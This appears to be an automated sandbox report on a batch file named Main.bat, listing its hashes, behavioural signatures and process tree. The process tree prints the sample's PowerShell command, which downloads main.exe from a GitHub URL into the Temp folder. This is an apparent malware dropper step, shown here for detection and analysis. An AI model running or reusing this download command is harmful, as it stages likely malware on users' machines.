Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
02/03/2025, 21:26
Static task
static1
Behavioral task
behavioral1
Sample
Main.bat
Resource
win7-20241010-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Main.bat
Resource
win10v2004-20250217-en
19 signatures
150 seconds
General
-
Target
Main.bat
-
Size
458B
-
MD5
7fe7990fe96629419bef8f2b22415163
-
SHA1
a147bd40dd7a0465bbce96282af8d3cb1a11b57d
-
SHA256
ac74bb9370b5d6eff52190fe5767a21e6c3083e370b66506cc249a30d074f768
-
SHA512
5d8d925e133e7cc33cdb154cc596c40be7e1d8e9438e640f6e3128ba50b1ad1af5ebde614edfa54d45de436168949e08b1deec0b983b7314dc407f595b709754
Score
8/10
Malware Config
Signatures
-
pid Process 2380 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2380 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1824 wrote to memory of 2380 1824 cmd.exe 31 PID 1824 wrote to memory of 2380 1824 cmd.exe 31 PID 1824 wrote to memory of 2380 1824 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Main.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/udx177/Main/refs/heads/main/main.exe -OutFile C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-